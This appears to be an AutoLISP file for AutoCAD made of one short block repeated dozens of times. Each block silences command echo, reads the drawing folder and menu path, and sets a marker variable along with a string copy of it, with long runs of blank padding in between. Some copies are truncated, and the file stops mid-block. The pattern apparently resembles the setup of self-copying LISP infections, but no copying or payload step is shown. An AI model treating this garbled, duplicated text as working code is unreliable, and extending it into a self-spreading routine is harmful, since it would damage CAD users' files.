(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                         
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
                                                                                                                         
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
                                                                                                                         
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq flagx t)
(setq bz "(setq flagx t)")
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(
 setq
  wold_cmd
   (
    getvar
     "cmdecho"
   )
)
(
 setvar
  "cmdecho"
  0
)
(
 setq
bb 1
)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
